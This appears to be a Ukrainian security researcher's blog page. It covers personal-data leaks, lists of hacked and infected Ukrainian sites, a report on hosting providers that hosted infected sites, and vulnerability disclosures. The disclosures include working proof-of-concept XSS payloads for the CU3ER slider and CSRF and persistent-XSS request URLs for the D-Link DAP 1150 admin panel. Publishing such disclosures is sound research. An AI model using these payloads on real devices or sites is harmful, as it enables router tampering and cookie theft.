Websecurity - Веб безпека

В Україні вже давно мають місце проблеми з витоками персональних даних. Про це я писав на протязі багатьох років і кожен українець, хто отримував дзвінки чи смски рекламного характеру (по стаціонарному чи мобільному телефону), стикався з цим. Витоки емайл адрес з розсиланням спаму також трапляються регулярно.

В тому числі я писав про витоки баз даних персональних даних українців. Як то база телефонних номерів Укртелекому, що з початку 2000-х продається на дисках на Радіоринку, Петровці та інших місцях продажу піратських дисків, і витік даних з бази “Служба 109″ Укртелекому на їхньому сайті. А також витоки інформації на різних сайтах - як я зазначав, такі витоки допускають ПриватБанк та деякі інші компанії.

Таким чином вже друге десятиліття в Україні має місце проблема з захистом персональних даних громадян. І поки що вона не вирішується. Незважаючи на те, що в 2011 році була створена Державна служби України з питань захисту персональних даних.

Про уразливості на сайті цієї служби zpd.gov.ua я вже писав. Вони не слідкують за безпекою власного сайту (який може бути взломаним і можуть бути вкрадені персональні дані, що на ньому зберігаються), ігнорують мої повідомлення про уразливості і не виправляють їх. Як і не займаються безпосередньо своєю роботою - захистом персональних даних. Що добре видно зі всіх цих кричущих випадків витоків персональних даних, якими переповнений Уанет і на які вони закривають очі.

Тобто ця служба лише зроблена для відводу очей, щоб зробити вигляд, що влада бореться з порушеннями в сфері персональних даних, але насправді служба нічого не робить. І скоріше за все за всі ці роки вона лише проїдала державні кошти без жодної користі для держави. Ось яскравий приклад роботи цієї служби.

В 2012 році відбувся витік бази даних сайта solor.da-kyiv.gov.ua, в якій містилися персональні дані. А в Уанеті окрім навмисних витоків трапляються і взломи сайтів з викраденням персональних даних (які в подальшому можуть бути розміщені в Інтернеті). Так ця служба не відреагувала на даний інцидент, навіть після мого листа з повідомленням про цей випадок. Їм байдуже, що відбуваються витоки персональних даних українців, їм аби фінансування виділялося, а там хоч трава не рости.

Враховуючи, що в останній час ведуться розмови про люстрацію, то я раджу обов’язково люструвати Державну служби України з питань захисту персональних даних. Усю службу: від керівництва до останнього працівника. Щоб вони несли відповідальність за марне проїдання державних коштів і не виконання своїх обов’язків.

P.S.

Після написання цієї статті трапився інцидент з передвиборчими витоками персональних даних.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.scourt.gov.ua (хакером fr0g) - 04.09.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://svitanok.gov.ua (хакером d3b~X) - 11.03.2014 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://vesti.ua (хакерами з PATRIOTS) - 16.04.2014, зараз сайт вже виправлений адмінами
• http://viknari.com.ua (хакером redspy)
• http://troyanda.kr.ua (хакерами з Iran Security Team) - 15.04.2014, зараз сайт не працює (відключений провайдером через його взлом)

В даній добірці уразливості в веб додатках:

• HP LoadRunner, Remote Code Execution and Denial of Service (DoS) (деталі)
• LiveZilla 5.1.1.0 Stored XSS in operator clients (деталі)
• FlashCanvas 1.5 proxy.php XSS Vulnerability (деталі)
• Vtiger 5.4.0 Reflected Cross Site Scripting (деталі)
• Samsung TV - DoS vulnerability (деталі)

22.11.2013

У жовтні, 12.10.2013, я виявив Content Spoofing та Cross-Site Scripting уразливості в CU3ER. Це 3D слайдер зображень на флеші. Про що найближчим часом повідомлю розробникам веб додатку.

Детальна інформація про уразливості з’явиться пізніше.

17.04.2014

Content Spoofing (WASC-12):

http://site/cu3er.swf?xml=http://site2/1.xml

1.xml:

<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>http://websecurity.com.ua</link>
</slide>
</slides>
</cu3er>

Cross-Site Scripting (WASC-08):

http://site/cu3er.swf?xml=http://site2/xss.xml

xss.xml:

<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>javascript:alert(document.cookie)</link>
</slide>
</slides>
</cu3er>

Для атаки між доменами потрібен crossdomain.xml на сайті з xml-файлами.

Це приклади CS і XSS атак для версії CU3ER 0.9.2. Для останньої версії 1.24 потрібні інші xml-файли та для флешки вказується інший параметр.

CS (WASC-12):

http://site/cu3er.swf?xml_location=http://site2/1.xml

cu3er-3.xml

XSS (WASC-08):

http://site/cu3er.swf?xml_location=http://site2/xss.xml

cu3er-4.xml

Уразливі CU3ER 1.24 та попередні версії.

Нещодавно, 2 і 3 квітня, вийшли PHP 5.5.11 і PHP 5.4.27 відповідно. У версії 5.5.11 виправлено декілька багів і одна уразливість, а у версії 5.4.27 виправлено 5 багів і одна уразливість. Дані релізи направлені на покращення безпеки та стабільності гілок 5.4.x і 5.5.x.

У PHP 5.4.27 і PHP 5.5.11 виправлено:

• Уразливість CVE-2013-7345.

По матеріалам http://www.php.net.

В своїх звітах про Інфіковані хостери в 1 півріччі 2013 року та Інфіковані хостери в 2 півріччі 2013 року я розповів, що в Уанеті було 130 інфікованих сайтів в першому півріччі та 96 інфікованих сайти в другому півріччі минулого року, і навів перелік хостерів, що хостили ці інфіковані сайти. А зараз наведу загальний перелік інфікованих хостерів за весь рік.

Всього в 2013 році було інфіковано 226 сайтів (виявлених мною). Всього було 81 провайдерів, що розміщували дані сайти.

Багато з цих хостінг провайдерів, робили це як в першому, так й другому півріччі минулого року (18 провайдерів), а деякі робили це і 2012 року. Тобто це в них звичайна практика. Цей звіт призначений для того, щоб і хостери і Інтернет користувачі знали найбільших розповсюджувачів шкідливого програмного забезпечення (через інфіковані сайти).

В минулому році наступні хостінг провайдери розміщували на своїх серверах інфіковані сайти: 1GB LLC, Avguro Technologies, Besthosting, Bizland, CHOOPA, Cityhost, Colocall, Compubyte Limited, Confluence Networks, CrimeaInfocom, DCTeL, DMedia, Datagroup, Delta-X, Digiq Net, Digital Ventures, Dream Line, FastVPS, Freehost, Golden Telecom, Goodnet, Hetzner, HostBizUa, HostLife, HostPro, Hosting.ua, Hvosting, ISPsystem, Info-center, Infocom, Intelex, Internet Communications, KHRSA, Keyweb Online, Kyivstar, LNUA, Langate, LeaseWeb, Mageal, Majorhost, Microsoft, MiroHost, Modus, NAU, Navigator Online, Net Access Corporation, PlusServer, Relink, Rusonyx, Server.ua, ServerSnab, Service Online, Shantyr, TW Telecom, TeNeT, The First, The Planet, TheHost, TimeWeb Co., TutHost, UA Servers, UARNet, UkrNet, Ukraine, Ukrainian Internet Names Center, Unlim, Uteam, VOLZ, VPS.ua, Velton Telecom, Vizor, Volia, Web-Com, Wnet, XServer, Xirra, eServer.ru, iPROsrv, iWeb, Мета, Укртелеком.

Найбільші інфіковані хостери (TOP-10):

1. Delta-X - 17 сайтів
2. Datagroup - 15 сайтів
3. Compubyte Limited - 15 сайтів
4. Besthosting - 12 сайтів
5. Hetzner - 11 сайтів
6. HostPro - 10 сайтів
7. Freehost - 9 сайтів
8. Wnet - 7 сайтів
9. MiroHost - 7 сайтів
10. Colocall - 5 сайтів

Всього було виявлено хостінги 218 сайтів з 226. У випадку інших 8 сайтів визначити хостінги не вдалося, тому що в даний момент ці сайти вже не працювали (вони явно були закриті через розміщення malware на цих ресурсах).

В даній добірці експлоіти в веб додатках:

• Plex Media Server 0.9.9.2.374-aa23a69 - Multiple Vulnerabilities (деталі)
• Oracle Demantra 12.2.1 - Arbitrary File Disclosure (деталі)
• Oracle Demantra 12.2.1 - SQL Injection Vulnerability (деталі)
• Mozilla Firefox 5-15 vulnerability Download and Execute (деталі)
• Linksys E-series Unauthenticated Remote Code Execution Exploit (деталі)

Продовжуючи тему уразливостей в D-Link DAP 1150. Раніше я розповідав про два режими роботи цього пристрою і зараз представляю нові уразливості в режимі роутера. У листопаді, 17.11.2011, я виявив численні Cross-Site Request Forgery, Abuse of Functionality та Cross-Site Scripting уразливості в D-Link DAP 1150 (Wi-Fi Access Point and Router).

Уразлива версія D-Link DAP 1150, Firmware version 1.2.94. Дана модель з іншими прошивками також повинна бути вразливою. Компанія D-Link тоді проігнорувала усі уразливості в цьому пристрої й досі їх не виправила.

Нагадаю, що в першому звіті про уразливості в D-Link DAP 1150, я писав про CSRF в формі логіна в адмінку пристрою та інші уразливості, що дозволяють віддалено входити в адмінку для проведення CSRF і XSS атак всередині адмінки.

CSRF (WASC-09):

В розділі Firewall / DMZ через CSRF можна змінювати налаштувань DMZ.

Включити DMZ:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=23&res_struct_size=0&res_buf={%22enable%22:true,%22ip%22:%22192.168.1.1%22}&res_pos=0

Виключити DMZ:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=23&res_struct_size=0&res_buf={%22enable%22:false,%22ip%22:%22%22}&res_pos=0

CSRF (WASC-09):

В розділі Control / URL-filter через CSRF можна додавати, редагувати та видаляти налаштування URL-фільтрів.

Додати:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_struct_size=0&res_config_id=58&res_buf={%22url%22:%22http://site%22,%20%22enable%22:%22ACCEPT%22}&res_pos=-1

Редагувати:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_struct_size=0&res_config_id=58&res_buf={%22url%22:%22http://site%22,%20%22enable%22:%22ACCEPT%22}&res_pos=0

Видалити:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_struct_size=0&res_config_id=58&res_pos=0

Abuse of Functionality (WASC-42):

Цей функціонал можна використати для блокування доступу користувачам роутера до сайтів. Заборонити доступ до google.com:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_struct_size=0&res_config_id=58&res_buf={%22url%22:%22http://google.com%22,%20%22enable%22:%22DROP%22}&res_pos=-1

XSS (WASC-08):

Це persistent XSS. Код виконається в розділі Control / URL-filter.

Атака через функцію додавання в параметрі res_buf:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_struct_size=0&res_config_id=58&res_buf={%22url%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22enable%22:%22%22}&res_pos=-1

28.02.2014

Виявлені численні уразливості безпеки в Apache Tomcat.

Уразливі версії: Apache Tomcat 7.0, Tomcat 8.0.

Витік інформації, DoS, фіксація сеансів.

• CVE-2013-4590 Information disclosure via XXE when running untrusted web applications (деталі)
• CVE-2013-4322 Incomplete fix for CVE-2012-3544 (Denial of Service) (деталі)
• CVE-2013-4286 Incomplete fix for CVE-2005-2090 (Information disclosure) (деталі)
• CVE-2014-0033 Session fixation still possible with disableURLRewriting enabled (деталі)

16.04.2014

Додаткова інформація.

• Apache Commons FileUpload and Apache Tomcat DoS (деталі)

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://tiande-rivne-com-ua.1gb.ua - інфекція була виявлена 29.01.2014. Зараз сайт входить до переліку підозрілих.
• http://mignews.com.ua - інфекція була виявлена 18.03.2014. Зараз сайт не входить до переліку підозрілих.
• http://mignews.com - інфекція була виявлена 18.03.2014. Зараз сайт не входить до переліку підозрілих.
• http://weblog.com.ua - інфекція була виявлена 18.03.2014. Зараз сайт не входить до переліку підозрілих.
• http://statuspress.com.ua - інфекція була виявлена 19.03.2014. Зараз сайт не входить до переліку підозрілих.